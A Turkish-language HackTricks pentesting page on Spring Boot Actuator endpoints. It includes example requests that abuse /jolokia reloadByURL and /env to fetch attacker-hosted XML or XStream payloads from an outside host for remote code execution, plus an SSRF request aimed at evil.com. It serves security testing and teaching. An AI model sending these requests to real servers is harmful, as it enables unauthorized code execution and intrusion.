hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

5.8 KiB
Raw Blame History

Spring Actuators

{% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %} {% endhint %}

Spring Auth Bypass

Kaynak https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Spring Boot Actuators'ı Sömürme

Orijinal gönderiyi kontrol edin [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Ana Noktalar:

  • Spring Boot Actuators, /health, /trace, /beans, /env gibi uç noktaları kaydeder. 1 ile 1.4 sürümleri arasında, bu uç noktalar kimlik doğrulama olmadan erişilebilir. 1.5 sürümünden itibaren yalnızca /health ve /info varsayılan olarak hassas değildir, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakır.
  • Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart ve /heapdump.
  • Spring Boot 1.x'te, actuator'lar kök URL altında kaydedilirken, 2.x'te /actuator/ temel yolu altındadır.

Sömürü Teknikleri:

  1. '/jolokia' Üzerinden Uzaktan Kod Çalıştırma:
  • /jolokia actuator uç noktası, MBean'lere HTTP erişimi sağlayan Jolokia Kütüphanesini açığa çıkarır.
  • reloadByURL eylemi, dış bir URL'den günlükleme yapılandırmalarını yeniden yüklemek için sömürülebilir; bu, kör XXE veya özel XML yapılandırmaları aracılığıyla Uzaktan Kod Çalıştırma ile sonuçlanabilir.
  • Örnek sömürü URL'si: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
  1. '/env' Üzerinden Yapılandırma Değişikliği:
  • Spring Cloud Kütüphaneleri mevcutsa, /env uç noktası çevresel özelliklerin değiştirilmesine izin verir.
  • Özellikler, Eureka serviceURL'deki XStream deserialization açığını sömürmek gibi açıkları istismar etmek için manipüle edilebilir.
  • Örnek sömürü POST isteği:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Diğer Kullanışlı Ayarlar:
  • spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url ve spring.datasource.tomcat.max-active gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerini değiştirme gibi çeşitli sömürüler için manipüle edilebilir.

Ek Bilgiler:

  • Varsayılan actuator'ların kapsamlı bir listesi burada bulunabilir.
  • Spring Boot 2.x'teki /env uç noktası, özellik değişikliği için JSON formatını kullanır, ancak genel kavram aynı kalır.

İlgili Konular:

  1. Env + H2 RCE:
  • /env uç noktası ve H2 veritabanının kombinasyonunu sömürme detayları burada bulunabilir.
  1. Yanlış Yol Adı Yorumlaması Üzerinden Spring Boot'ta SSRF:
  • Spring çerçevesinin HTTP yol adlarındaki matris parametrelerini (;) ele alması, Sunucu Tarafı İstek Sahteciliği (SSRF) için sömürülebilir.
  • Örnek sömürü isteği:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

{% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %} {% endhint %}